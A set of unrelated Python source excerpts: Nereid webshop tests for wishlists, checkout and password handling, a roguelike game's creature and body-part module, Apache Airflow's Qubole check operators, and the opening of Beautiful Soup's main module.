)
rv = c.get(
'/wishlists/{0}'
.format(self.registered_user.wishlists[0].id)
)
self.assertIn(product1.name, rv.data)
# Add another product.
rv = c.post(
'wishlists/products',
data={
'product': product2.products[0].id,
'action': 'add',
'wishlist': self.registered_user.wishlists[0].id
}
)
self.assertEqual(rv.status_code, 302)
self.assertEqual(
len(self.registered_user.wishlists[0].products),
2
)
rv = c.get(
'/wishlists/{0}'
.format(self.registered_user.wishlists[0].id)
)
self.assertIn(product2.name, rv.data)
# Remove a product
rv = c.post(
'wishlists/products',
data={
'product': product2.products[0].id,
'wishlist': self.registered_user.wishlists[0].id,
'action': 'remove'
}
)
self.assertEqual(rv.status_code, 302)
self.assertEqual(
len(self.registered_user.wishlists[0].products),
1
)
rv = c.get(
'/wishlists/{0}'
.format(self.registered_user.wishlists[0].id)
)
self.assertNotIn(product2.name, rv.data)
@unittest.skip("Not implemented yet.")
def test_0050_profile(self):
"""
Test the profile.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
# Without login.
rv = c.get('/me')
self.assertEqual(rv.status_code, 302)
self.login(c, 'email@example.com', 'password')
rv = c.post(
'/me',
data={
'display_name': 'Pritish C',
'timezone': 'Asia/Kolkata'
}
)
self.assertEqual(rv.status_code, 302)
rv = c.get('/me')
self.assertIn('Pritish C', rv.data)
self.assertIn('Asia/Kolkata', rv.data)
def test_0055_guest_checkout(self):
"""
Test for guest checkout.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
self.create_test_products()
app = self.get_app()
product1, = self.ProductTemplate.search([
('name', '=', 'product 1')
])
product2, = self.ProductTemplate.search([
('name', '=', 'product 2')
])
country = self.Country(self.available_countries[0])
subdivision = country.subdivisions[0]
with app.test_client() as c:
rv = c.post(
'/cart/add',
data={
'product': product1.products[0].id,
'quantity': 5
}
)
self.assertEqual(rv.status_code, 302)
rv = c.get('/checkout/sign-in')
self.assertEqual(rv.status_code, 200)
# Trying to checkout with a registered email.
# Should fail.
rv = c.post(
'/checkout/sign-in',
data={
'email': 'email@example.com'
}
)
self.assertEqual(rv.status_code, 200)
self.assertIn(
'{0}'.format(self.registered_user.email),
rv.data
)
self.assertIn(
'is tied to an existing account',
rv.data
)
# Now with a new email.
rv = c.post(
'/checkout/sign-in',
data={
'email': 'new@example.com',
'checkout_mode': 'guest'
}
)
self.assertEqual(rv.status_code, 302)
self.assertTrue(
rv.location.endswith('/checkout/shipping-address')
)
# Shipping address page should render.
rv = c.get('/checkout/shipping-address')
self.assertEqual(rv.status_code, 200)
# Copied from nereid-checkout - adding shipping address.
rv = c.post(
'/checkout/shipping-address',
data={
'name': 'Sharoon Thomas',
'street': 'Biscayne Boulevard',
'streetbis': 'Apt. 1906, Biscayne Park',
'zip': 'FL33137',
'city': 'Miami',
'phone': '1234567890',
'country': country.id,
'subdivision': subdivision.id,
}
)
self.assertEqual(rv.status_code, 302)
self.assertTrue(
rv.location.endswith('/checkout/validate-address')
)
# Copied from nereid-checkout - adding billing address.
rv = c.post(
'/checkout/billing-address',
data={
'name': 'Sharoon Thomas',
'street': 'Biscayne Boulevard',
'streetbis': 'Apt. 1906, Biscayne Park',
'zip': 'FL33137',
'city': 'Miami',
'phone': '1234567890',
'country': country.id,
'subdivision': subdivision.id,
}
)
self.assertEqual(rv.status_code, 302)
self.assertTrue(
rv.location.endswith('/checkout/payment')
)
with Transaction().set_context(company=self.company.id):
self._create_auth_net_gateway_for_site()
# Try to pay using credit card
rv = c.post(
'/checkout/payment',
data={
'owner': 'Joe Blow',
'number': '4111111111111111',
'expiry_year': '2018',
'expiry_month': '01',
'cvv': '911',
'add_card_to_profiles': 'y',
}
)
self.assertEqual(rv.status_code, 302)
self.assertTrue('/order/' in rv.location)
self.assertTrue('access_code' in rv.location)
sale, = self.Sale.search([('state', '=', 'confirmed')])
payment_transaction, = sale.gateway_transactions
self.assertEqual(payment_transaction.amount, sale.total_amount)
rv = c.get('/order/{0}'.format(sale.id))
self.assertEqual(rv.status_code, 302) # Orders page redirect
def test_0060_registered_checkout(self):
"""
Test for registered user checkout.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
self.create_test_products()
app = self.get_app()
product1, = self.ProductTemplate.search([
('name', '=', 'product 1')
])
product2, = self.ProductTemplate.search([
('name', '=', 'product 2')
])
country = self.Country(self.available_countries[0])
subdivision = country.subdivisions[0]
with app.test_client() as c:
rv = c.post(
'/cart/add',
data={
'product': product1.products[0].id,
'quantity': 5
}
)
self.assertEqual(rv.status_code, 302)
# Now sign in to checkout.
rv = c.post(
'/checkout/sign-in',
data={
'email': 'email@example.com',
'password': 'password',
'checkout_mode': 'account'
}
)
self.assertEqual(rv.status_code, 302)
self.assertTrue(rv.location.endswith('/shipping-address'))
# Shipping address page should render.
rv = c.get('/checkout/shipping-address')
self.assertEqual(rv.status_code, 200)
# Copied from nereid-checkout - adding shipping address.
rv = c.post(
'/checkout/shipping-address',
data={
'name': 'Sharoon Thomas',
'street': 'Biscayne Boulevard',
'streetbis': 'Apt. 1906, Biscayne Park',
'zip': 'FL33137',
'city': 'Miami',
'phone': '1234567890',
'country': country.id,
'subdivision': subdivision.id,
}
)
self.assertEqual(rv.status_code, 302)
self.assertTrue(
rv.location.endswith('/checkout/validate-address')
)
# Copied from nereid-checkout - adding billing address.
rv = c.post(
'/checkout/billing-address',
data={
'name': 'Sharoon Thomas',
'street': 'Biscayne Boulevard',
'streetbis': 'Apt. 1906, Biscayne Park',
'zip': 'FL33137',
'city': 'Miami',
'phone': '1234567890',
'country': country.id,
'subdivision': subdivision.id,
}
)
self.assertEqual(rv.status_code, 302)
self.assertTrue(
rv.location.endswith('/checkout/payment')
)
with Transaction().set_context(company=self.company.id):
self._create_auth_net_gateway_for_site()
# Try to pay using credit card
rv = c.post(
'/checkout/payment',
data={
'owner': 'Joe Blow',
'number': '4111111111111111',
'expiry_year': '2018',
'expiry_month': '01',
'cvv': '911',
'add_card_to_profiles': '',
}
)
self.assertEqual(rv.status_code, 302)
self.assertTrue('/order/' in rv.location)
self.assertTrue('access_code' in rv.location)
sale, = self.Sale.search([('state', '=', 'confirmed')])
payment_transaction, = sale.gateway_transactions
self.assertEqual(payment_transaction.amount, sale.total_amount)
rv = c.get('/order/{0}'.format(sale.id))
self.assertEqual(rv.status_code, 200)
rv = c.get(
'/order/{0}?access_code={1}'
.format(sale.id, sale.guest_access_code)
)
self.assertEqual(rv.status_code, 200)
def test_0065_password_reset(self):
"""
Test for password reset.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
# Resetting without login
rv = c.get('/reset-account')
self.assertEqual(rv.status_code, 200)
# Resetting through email
response = c.post(
'/reset-account',
data={
'email': 'email@example.com'
}
)
self.assertEqual(response.status_code, 302)
# Login after requesting activation code.
self.login(c, 'email@example.com', 'password')
# Reset properly.
with app.test_client() as c:
response = c.post(
'/reset-account',
data={
'email': 'email@example.com'
}
)
self.assertEqual(response.status_code, 302)
# Resetting with an invalid code.
# Login with new pass should be rejected.
invalid = 'badcode'
response = c.post(
'/new-password/{0}/{1}'.format(
self.registered_user.id,
invalid
),
data={
'password': 'reset-pass',
'confirm': 'reset-pass'
}
)
self.assertEqual(response.status_code, 302)
response = c.post(
'/login',
data={
'email': 'email@example.com',
'password': 'reset-pass'
}
)
# rejection
self.assertEqual(response.status_code, 200)
# Now do it with the right code.
# This time, login with old pass should be rejected.
response = c.post(
self.registered_user.get_reset_password_link(),
data={
'password': 'reset-pass',
'confirm': 'reset-pass'
}
)
self.assertEqual(response.status_code, 302)
response = c.post(
'/login',
data={
'email': 'email@example.com',
'password': 'password'
}
)
self.assertEqual(response.status_code, 200)
self.login(c, 'email@example.com', 'reset-pass')
def test_0070_change_password(self):
"""
Test for password change.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
data = {
'party': self.party2.id,
'display_name': 'Registered User',
'email': 'email@example.com',
'password': 'password',
'company': self.company.id
}
with app.test_client() as c:
response = c.get('/change-password')
# Without login
self.assertEqual(response.status_code, 302)
# Try POST, but without login
response = c.post('/change-password', data={
'password': data['password'],
'confirm': data['password']
})
self.assertEqual(response.status_code, 302)
# Now login
self.login(c, data['email'], data['password'])
# Incorrect password confirmation
response = c.post(
'/change-password',
data={
'password': 'new-password',
'confirm': 'oh-no-you-dont'
}
)
self.assertEqual(response.status_code, 200)
self.assertTrue("must match" in response.data)
# Send proper confirmation but without old password.
response = c.post(
'/change-password',
data={
'password': 'new-pass',
'confirm': 'new-pass'
}
)
self.assertEqual(response.status_code, 200)
# Send proper confirmation with wrong old password
response = c.post(
'/change-password',
data={
'old_password': 'passw',
'password': 'new-pass',
'confirm': 'new-pass'
}
)
self.assertEqual(response.status_code, 200)
self.assertTrue(
'current password you entered is invalid' in response.data
)
# Do it right
response = c.post(
'/change-password',
data={
'old_password': data['password'],
'password': 'new-pass',
'confirm': 'new-pass'
}
)
self.assertEqual(response.status_code, 302)
# Check login with new pass
c.get('/logout')
self.login(c, data['email'], 'new-pass')
def test_0075_products(self):
"""
Tests product templates and variants.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
self.create_test_products()
rv = c.get('/products')
self.assertIn('product 1', rv.data)
self.assertIn('product 2', rv.data)
self.assertIn('product 3', rv.data)
rv = c.get('/product/product-1')
self.assertEqual(rv.status_code, 200)
self.assertIn('product 1', rv.data)
template1, = self.ProductTemplate.search([
('name', '=', 'product 1')
])
template1.active = False
template1.save()
rv = c.get('/product/product-1')
self.assertEqual(rv.status_code, 404)
def test_0080_search_results(self):
"""
Test the search results template.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
self.create_test_products()
rv = c.get('/search?q=product')
self.assertIn('product 1', rv.data)
self.assertIn('product-1', rv.data)
self.assertIn('product 2', rv.data)
self.assertIn('product-2', rv.data)
self.assertIn('product 3', rv.data)
self.assertIn('product-3', rv.data)
|
|
from ai import *
from tweaks import log as LOG
from graphics import MessageBox as MSG
log = lambda *x: LOG(*x, f='logs/creatures.log')
class Stats:
possible = []
def init_class():
I = open('stats.txt')
for line in I:
if '#' in line: continue
long, short, description = line[:-1].split(':')
Stats.possible += [[long, short, description]]
I.close()
def __init__(self, dic):
assert(set([i[1] for i in Stats.possible]) == set(dic.keys()))
self.dic = dic.copy()
def copy(self):
return Stats(self.dic)
Stats.init_class()
class Race:
def __init__(self, racename, symbol, ai_class):
assert(type(racename) == str)
assert(type(symbol) == str)
assert(len(symbol) == 1)
self.name = racename
self.symbol = symbol
self.ai_class = ai_class
def set_stats(self, stats):
assert(type(stats) == Stats)
self.stats = stats
human_race = Race('human', 'h', random_AI)
goblin_race = Race('goblin', 'g', seeker_AI)
dwarven_race = Race('dwarf', 'd', idiot_AI)
class BodyPart:
def __init__(self, name, size, functions):
self.name = name
self.size = size
self.functions = functions
self.health = 100 #100 is excelent, 0 is gone, <50 is a serious malfunction
#Which functions are vital is decided for each creature depending on its needs
#Damage is also stored here
def clone(self):
return BodyPart(self.name, self.size, self.functions) #A fully healed copy
def take_damage(self, dmg):
assert(dmg >= 0)
self.health -= min(dmg, self.health)
log(self.name, 'takes', dmg, 'damage')
heart = BodyPart('heart', '0.5', ['blood pressure'])
brain = BodyPart('brain', '2', ['consciousness', 'perception', 'control'])
skin = BodyPart('skin', '10', ['disease resistance', 'protection'])
hand = BodyPart('hand', '5', ['manipulation'])
eyes = BodyPart('eyes', '1', ['vision'])
class Body:
def __init__(self, parts, root, connect): #Connect is a list of tuples, each of them contains a pair of
#connected organs from root to skin (e.g. ('brain', 'skull'))
for i in parts:
if i.name == root.name:
parts.remove(i)
self.parts = [i.clone() for i in parts]
self.root = root.clone()
self.parts.append(self.root)
self.connect = connect #A crutch for cloning
for i in range(len(self.parts)):
self.parts[i].outside = []
self.parts[i].inside = []
for fro,to in connect:
if self.parts[i].name == fro:
for j in self.parts:
if j.name == to:
to = j
break
self.parts[i].outside.append(to)
elif self.parts[i].name == to:
for j in self.parts:
if j.name == fro:
fro = j
break
self.parts[i].inside.append(fro)
for i in [j.outside for j in self.parts]:
pass
def clone(self):
return Body([i.clone() for i in self.parts], self.root.clone(), self.connect[:])
bdy = Body([heart, brain, skin, eyes], brain, [('brain', 'heart'), ('brain', 'skin'), ('heart', 'skin'), ('brain', 'eyes')])
class Creature:
symbol = None
__max_id = 0
__reg = []
def __init__(self, race, name, body_template, stats=None, ai=None):
for i in Creature.__reg:
if i.name == name:
raise ValueError()
self.name = name
if stats == None:
stats = race.stats
if ai == None:
self.AI = race.ai_class(self)
elif isinstance(ai, type):
self.AI = ai(self)
else:
self.AI = ai
assert(isinstance(race, Race))
assert(type(name) == str)
self.needs = set()
self.body = body_template.clone()
for p in self.body.parts:
for f in p.functions:
self.needs.add(f)
self.race = race
self.alive = True
Creature.__max_id += 1
self.id = Creature.__max_id
Creature.__reg.append(self)
self.stats = stats
self.vision = self.stats.dic['VSN']
self.controlled_by_player = False
self.light = 0
self.effects = set()
self.check_health()
log('init called')
def check_health(self):
functions = set()
log(self.body.parts, self.body.root.outside)
for j in self.body.parts:
if j.health <= 50:
for i in j.functions:
if i == 'vision':
self.effects.add('blind')
elif i == 'consciousness':
self.effects.add('unconscious')
elif i == 'control':
self.effects.add('unconscious')
for p in self.body.parts:
if p.health <= 0:
if len(p.inside) == 1 and p in p.inside[0].outside:
p.inside[0].outside.remove(p)
log(self.name, p.name, 'is GONE, health is', p.health)
q = [p]
while q != []:
curr, q = q[0], q[1:]
for i in curr.outside:
if i.inside == [curr] and i not in q:
q.append(i)
self.body.parts.remove(curr)
if curr == self.body.root:
return False
else:
log(self.name, p.name, 'is OK, health is', p.health)
for p in self.body.parts:
for f in p.functions:
functions.add(f)
if functions == self.needs:
return True
else:
self.effects = set()
for i in self.needs - functions:
if i == 'vision':
self.effects.add('blind')
elif i == 'consciousness':
self.effects.add('unconscious')
elif i == 'control':
return False
elif i == 'blood pressure':
return False
return True
def get_symbol(self):
return self.symbol if self.symbol != None else self.race.symbol
def can_pass_through(self, cell):
if cell.floor.name not in ['sand', 'stone', 'dirt']: return False
if cell.fill.name not in ['air', 'void']: return False
if cell.statics != None and [True for i in cell.statics if not i.passible] != []: return False
return True
def die(self):
self.AI = None
if self.controlled_by_player:
MSG.pop('You die')
self.alive = False
def where_is(self):
try:
return (self.x, self.y)
except:
return None
@property
def position(self):
return (self.x, self.y)
@position.setter
def position(self, p):
self.x, self.y = p
def by_id(ID):
for i in Creature.__reg:
if i.id == ID:
return i
def get_stat(self, stat):
if stat in self.stats.dic:
return self.stats.dic[stat]
else:
raise ValueError('No such stat -', stat)
# INTERACTIONS
def open_door(self, d):
if d.kind != 'closed_door':
return False
if self.stats.dic['INT'] < 2:
return False
d.kind = 'open_door'
d.passible = True
d.symbol = '/'
d.transparent = True
return True
def close_door(self, d):
if d.kind != 'open_door':
return False
if self.stats.dic['INT'] < 2:
return False
d.kind = 'closed_door'
d.passible = False
d.symbol = '+'
d.transparent = False
return True
def can(self, action):
manual_actions = 'open_door close_door grab'.split()
perception_actions = 'see hear smell'.split()
if action in manual_actions:
if 'manipulation' not in self.needs:
return False
for p in self.body.parts:
if 'manupulation' in p.functions:
return True
return False
if action in perception_actions:
flag = False
if 'perception' not in self.needs:
return False
if 'blind' in self.effects: return False
for p in self.body.parts:
if 'perception' in p.functions:
flag = True
if not flag: return False
if 'vision' not in self.needs:
return False
for p in self.body.parts:
if 'vision' in p.functions:
return True
return False
''' RACE STATS '''
human_stats = Stats({
'CHR': 10,
'STR': 10,
'INT': 10,
'LCK': 10,
'FCS': 10,
'WPR': 10,
'DXT': 10,
'SPD': 10,
'VSN': 40
})
human_race.set_stats(human_stats.copy())
goblin_race.set_stats(human_stats.copy())
dwarven_race.set_stats(human_stats.copy())
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from airflow.exceptions import AirflowException
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.providers.qubole.hooks.qubole_check import QuboleCheckHook
from airflow.providers.qubole.operators.qubole import QuboleOperator
from airflow.utils.decorators import apply_defaults
class QuboleCheckOperator(CheckOperator, QuboleOperator):
"""
Performs checks against Qubole Commands. ``QuboleCheckOperator`` expects
a command that will be executed on QDS.
By default, each value on first row of the result of this Qubole Command
is evaluated using python ``bool`` casting. If any of the
values return ``False``, the check is failed and errors out.
Note that Python bool casting evals the following as ``False``:
* ``False``
* ``0``
* Empty string (``""``)
* Empty list (``[]``)
* Empty dictionary or set (``{}``)
Given a query like ``SELECT COUNT(*) FROM foo``, it will fail only if
the count ``== 0``. You can craft much more complex query that could,
for instance, check that the table has the same number of rows as
the source table upstream, or that the count of today's partition is
greater than yesterday's partition, or that a set of metrics are less
than 3 standard deviation for the 7 day average.
This operator can be used as a data quality check in your pipeline, and
depending on where you put it in your DAG, you have the choice to
stop the critical path, preventing from
publishing dubious data, or on the side and receive email alerts
without stopping the progress of the DAG.
:param qubole_conn_id: Connection id which consists of qds auth_token
:type qubole_conn_id: str
kwargs:
Arguments specific to Qubole command can be referred from QuboleOperator docs.
:results_parser_callable: This is an optional parameter to
extend the flexibility of parsing the results of Qubole
command to the users. This is a python callable which
can hold the logic to parse list of rows returned by Qubole command.
By default, only the values on first row are used for performing checks.
This callable should return a list of records on
which the checks have to be performed.
.. note:: All fields in common with template fields of
QuboleOperator and CheckOperator are template-supported.
"""
template_fields = QuboleOperator.template_fields + CheckOperator.template_fields
template_ext = QuboleOperator.template_ext
ui_fgcolor = '#000'
@apply_defaults
def __init__(self, qubole_conn_id="qubole_default", *args, **kwargs):
sql = get_sql_from_qbol_cmd(kwargs)
super().__init__(qubole_conn_id=qubole_conn_id, sql=sql, *args, **kwargs)
self.on_failure_callback = QuboleCheckHook.handle_failure_retry
self.on_retry_callback = QuboleCheckHook.handle_failure_retry
def execute(self, context=None):
try:
self.hook = self.get_hook(context=context)
super().execute(context=context)
except AirflowException as e:
handle_airflow_exception(e, self.get_hook())
def get_db_hook(self):
return self.get_hook()
def get_hook(self, context=None):
if hasattr(self, 'hook') and (self.hook is not None):
return self.hook
else:
return QuboleCheckHook(context=context, *self.args, **self.kwargs)
def __getattribute__(self, name):
if name in QuboleCheckOperator.template_fields:
if name in self.kwargs:
return self.kwargs[name]
else:
return ''
else:
return object.__getattribute__(self, name)
def __setattr__(self, name, value):
if name in QuboleCheckOperator.template_fields:
self.kwargs[name] = value
else:
object.__setattr__(self, name, value)
class QuboleValueCheckOperator(ValueCheckOperator, QuboleOperator):
"""
Performs a simple value check using Qubole command.
By default, each value on the first row of this
Qubole command is compared with a pre-defined value.
The check fails and errors out if the output of the command
is not within the permissible limit of expected value.
:param qubole_conn_id: Connection id which consists of qds auth_token
:type qubole_conn_id: str
:param pass_value: Expected value of the query results.
:type pass_value: str or int or float
:param tolerance: Defines the permissible pass_value range, for example if
tolerance is 2, the Qubole command output can be anything between
-2*pass_value and 2*pass_value, without the operator erring out.
:type tolerance: int or float
kwargs:
Arguments specific to Qubole command can be referred from QuboleOperator docs.
:results_parser_callable: This is an optional parameter to
extend the flexibility of parsing the results of Qubole
command to the users. This is a python callable which
can hold the logic to parse list of rows returned by Qubole command.
By default, only the values on first row are used for performing checks.
This callable should return a list of records on
which the checks have to be performed.
.. note:: All fields in common with template fields of
QuboleOperator and ValueCheckOperator are template-supported.
"""
template_fields = QuboleOperator.template_fields + ValueCheckOperator.template_fields
template_ext = QuboleOperator.template_ext
ui_fgcolor = '#000'
@apply_defaults
def __init__(self, pass_value, tolerance=None, results_parser_callable=None,
qubole_conn_id="qubole_default", *args, **kwargs):
sql = get_sql_from_qbol_cmd(kwargs)
super().__init__(
qubole_conn_id=qubole_conn_id,
sql=sql, pass_value=pass_value, tolerance=tolerance,
*args, **kwargs)
self.results_parser_callable = results_parser_callable
self.on_failure_callback = QuboleCheckHook.handle_failure_retry
self.on_retry_callback = QuboleCheckHook.handle_failure_retry
def execute(self, context=None):
try:
self.hook = self.get_hook(context=context)
super().execute(context=context)
except AirflowException as e:
handle_airflow_exception(e, self.get_hook())
def get_db_hook(self):
return self.get_hook()
def get_hook(self, context=None):
if hasattr(self, 'hook') and (self.hook is not None):
return self.hook
else:
return QuboleCheckHook(
context=context,
*self.args,
results_parser_callable=self.results_parser_callable,
**self.kwargs
)
def __getattribute__(self, name):
if name in QuboleValueCheckOperator.template_fields:
if name in self.kwargs:
return self.kwargs[name]
else:
return ''
else:
return object.__getattribute__(self, name)
def __setattr__(self, name, value):
if name in QuboleValueCheckOperator.template_fields:
self.kwargs[name] = value
else:
object.__setattr__(self, name, value)
def get_sql_from_qbol_cmd(params):
sql = ''
if 'query' in params:
sql = params['query']
elif 'sql' in params:
sql = params['sql']
return sql
def handle_airflow_exception(airflow_exception, hook):
cmd = hook.cmd
if cmd is not None:
if cmd.is_success(cmd.status):
qubole_command_results = hook.get_query_results()
qubole_command_id = cmd.id
exception_message = '\nQubole Command Id: {qubole_command_id}' \
'\nQubole Command Results:' \
'\n{qubole_command_results}'.format(
qubole_command_id=qubole_command_id, # noqa: E122
qubole_command_results=qubole_command_results)
raise AirflowException(str(airflow_exception) + exception_message)
raise AirflowException(str(airflow_exception))
|
|
"""Beautiful Soup Elixir and Tonic - "The Screen-Scraper's Friend".
http://www.crummy.com/software/BeautifulSoup/
Beautiful Soup uses a pluggable XML or HTML parser to parse a
(possibly invalid) document into a tree representation. Beautiful Soup
provides methods and Pythonic idioms that make it easy to navigate,
search, and modify the parse tree.
Beautiful Soup works with Python 2.7 and up. It works better if lxml
and/or html5lib is installed.
For more than you ever wanted to know about Beautiful Soup, see the
documentation: http://www.crummy.com/software/BeautifulSoup/bs4/doc/
"""
__author__ = "Leonard Richardson (leonardr@segfault.org)"
__version__ = "4.9.3"
__copyright__ = "Copyright (c) 2004-2020 Leonard Richardson"
# Use of this source code is governed by the MIT license.
__license__ = "MIT"
__all__ = ['BeautifulSoup']
from collections import Counter
import os
import re
import sys
import traceback
import warnings
from .builder import builder_registry, ParserRejectedMarkup
from .dammit import UnicodeDammit
from .element import (
CData,
Comment,
DEFAULT_OUTPUT_ENCODING,
Declaration,
Doctype,
NavigableString,
PageElement,
ProcessingInstruction,
PYTHON_SPECIFIC_ENCODINGS,
ResultSet,
Script,
Stylesheet,
SoupStrainer,
Tag,
TemplateString,
)
# The very first thing we do is give a useful error if someone is
# running this code under Python 3 without converting it.
'You are trying to run the Python 2 version of Beautiful Soup under Python 3. This will not work.'!='You need to convert the code, either by installing it (`python setup.py install`) or by running 2to3 (`2to3 -w bs4`).'
# Define some custom warnings.
class GuessedAtParserWarning(UserWarning):
"""The warning issued when BeautifulSoup has to guess what parser to
use -- probably because no parser was specified in the constructor.
"""
class MarkupResemblesLocatorWarning(UserWarning):
"""The warning issued when BeautifulSoup is given 'markup' that
actually looks like a resource locator -- a URL or a path to a file
on disk.
"""
class BeautifulSoup(Tag):
"""A data structure representing a parsed HTML or XML document.
Most of the methods you'll call on a BeautifulSoup object are inherited from
PageElement or Tag.
Internally, this class defines the basic interface called by the
tree builders when converting an HTML/XML document into a data
structure. The interface abstracts away the differences between
parsers. To write a new tree builder, you'll need to understand
these methods as a whole.
These methods will be called by the BeautifulSoup constructor:
* reset()
* feed(markup)
The tree builder may call these methods from its feed() implementation:
* handle_starttag(name, attrs) # See note about return value
* handle_endtag(name)
* handle_data(data) # Appends to the current data node
* endData(containerClass) # Ends the current data node
No matter how complicated the underlying parser is, you should be
able to build a tree using 'start tag' events, 'end tag' events,
'data' events, and "done with data" events.
If you encounter an empty-element tag (aka a self-closing tag,
like HTML's <br> tag), call handle_starttag and then
handle_endtag.
"""
# Since BeautifulSoup subclasses Tag, it's possible to treat it as
# a Tag with a .name. This name makes it clear the BeautifulSoup
# object isn't a real markup tag.
ROOT_TAG_NAME = '[document]'
# If the end-user gives no indication which tree builder they
# want, look for one with these features.
DEFAULT_BUILDER_FEATURES = ['html', 'fast']
# A string containing all ASCII whitespace characters, used in
# endData() to detect data chunks that seem 'empty'.
ASCII_SPACES = '\x20\x0a\x09\x0c\x0d'
NO_PARSER_SPECIFIED_WARNING = "No parser was explicitly specified, so I'm using the best available %(markup_type)s parser for this system (\"%(parser)s\"). This usually isn't a problem, but if you run this code on another system, or in a different virtual environment, it may use a different parser and behave differently.\n\nThe code that caused this warning is on line %(line_number)s of the file %(filename)s. To get rid of this warning, pass the additional argument 'features=\"%(parser)s\"' to the BeautifulSoup constructor.\n"
def __init__(self, markup="", features=None, builder=None,
parse_only=None, from_encoding=None, exclude_encodings=None,
element_classes=None, **kwargs):
"""Constructor.
:param markup: A string or a file-like object representing
markup to be parsed.
:param features: Desirable features of the parser to be
used. This may be the name of a specific parser ("lxml",
"lxml-xml", "html.parser", or "html5lib") or it may be the
type of markup to be used ("html", "html5", "xml"). It's
recommended that you name a specific parser, so that
Beautiful Soup gives you the same results across platforms
and virtual environments.
:param builder: A TreeBuilder subclass to instantiate (or
instance to use) instead of looking one up based on
`features`. You only need to use this if you've implemented a
custom TreeBuilder.
:param parse_only: A SoupStrainer. Only parts of the document
matching the SoupStrainer will be considered. This is useful
when parsing part of a document that would otherwise be too
large to fit into memory.
:param from_encoding: A string indicating the encoding of the
document to be parsed. Pass this in if Beautiful Soup is
guessing wrongly about the document's encoding.
:param exclude_encodings: A list of strings indicating
encodings known to be wrong. Pass this in if you don't know
the document's encoding but you know Beautiful Soup's guess is
wrong.
:param element_classes: A dictionary mapping BeautifulSoup
classes like Tag and NavigableString, to other classes you'd
like to be instantiated instead as the parse tree is
built. This is useful for subclassing Tag or NavigableString
to modify default behavior.
:param kwargs: For backwards compatibility purposes, the
constructor accepts certain keyword arguments used in
Beautiful Soup 3. None of these arguments do anything in
Beautiful Soup 4; they will result in a warning and then be
ignored.
Apart from this, any keyword arguments passed into the
BeautifulSoup constructor are propagated to the TreeBuilder
constructor. This makes it possible to configure a
TreeBuilder by passing in arguments, not just by saying which
one to use.
"""
if 'convertEntities' in kwargs:
del kwargs['convertEntities']
warnings.warn(
"BS4 does not respect the convertEntities argument to the "
"BeautifulSoup constructor. Entities are always converted "
"to Unicode characters.")
if 'markupMassage' in kwargs:
del kwargs['markupMassage']
warnings.warn(
"BS4 does not respect the markupMassage argument to the "
"BeautifulSoup constructor. The tree builder is responsible "
"for any necessary markup massage.")
if 'smartQuotesTo' in kwargs:
del kwargs['smartQuotesTo']
warnings.warn(
"BS4 does not respect the smartQuotesTo argument to the "
"BeautifulSoup constructor. Smart quotes are always converted "
"to Unicode characters.")
if 'selfClosingTags' in kwargs:
del kwargs['selfClosingTags']
warnings.warn(
"BS4 does not respect the selfClosingTags argument to the "
"BeautifulSoup constructor. The tree builder is responsible "
"for understanding self-closing tags.")
if 'isHTML' in kwargs:
del kwargs['isHTML']
warnings.warn(
"BS4 does not respect the isHTML argument to the "
"BeautifulSoup constructor. Suggest you use "
"features='lxml' for HTML and features='lxml-xml' for "
"XML.")
def deprecated_argument(old_name, new_name):
if old_name in kwargs:
warnings.warn(
'The "%s" argument to the BeautifulSoup constructor '
'has been renamed to "%s."' % (old_name, new_name))
value = kwargs[old_name]
del kwargs[old_name]
return value
return None
parse_only = parse_only or deprecated_argument(
"parseOnlyThese", "parse_only")
from_encoding = from_encoding or deprecated_argument(
"fromEncoding", "from_encoding")
if from_encoding and isinstance(markup, str):
warnings.warn("You provided Unicode markup but also provided a value for from_encoding. Your from_encoding will be ignored.")
from_encoding = None
self.element_classes = element_classes or dict()
# We need this information to track whether or not the builder
# was specified well enough that we can omit the 'you need to
# specify a parser' warning.
original_builder = builder
original_features = features
if isinstance(builder, type):
# A builder class was passed in; it needs to be instantiated.
builder_class = builder
builder = None
elif builder is None:
if isinstance(features, str):
features = [features]
if features is None or len(features) == 0:
features = self.DEFAULT_BUILDER_FEATURES
builder_class = builder_registry.lookup(*features)
if builder_class is None:
raise FeatureNotFound(
"Couldn't find a tree builder with the features you "
"requested: %s. Do you need to install a parser library?"
% ",".join(features))
# At this point either we have a TreeBuilder instance in
# builder, or we have a builder_class that we can instantiate
# with the remaining **kwargs.
if builder is None:
builder = builder_class(**kwargs)
if not original_builder and not (
original_features == builder.NAME or
original_features in builder.ALTERNATE_NAMES
) and markup:
# The user did not tell us which TreeBuilder to use,
# and we had to guess. Issue a warning.
if builder.is_xml:
markup_type = "XML"
else:
markup_type = "HTML"
# This code adapted from warnings.py so that we get the same line
# of code as our warnings.warn() call gets, even if the answer is wrong
# (as it may be in a multithreading situation).
caller = None
try:
caller = sys._getframe(1)
except ValueError:
pass
if caller:
globals = caller.f_globals
line_number = caller.f_lineno
else:
globals = sys.__dict__
line_number= 1
filename = globals.get('__file__')
if filename:
fnl = filename.lower()
if fnl.endswith((".pyc", ".pyo")):
filename = filename[:-1]
if filename:
# If there is no filename at all, the user is most likely in a REPL,
# and the warning is not necessary.
values = dict(
filename=filename,
line_number=line_number,
parser=builder.NAME,
markup_type=markup_type
)
warnings.warn(
self.NO_PARSER_SPECIFIED_WARNING % values,
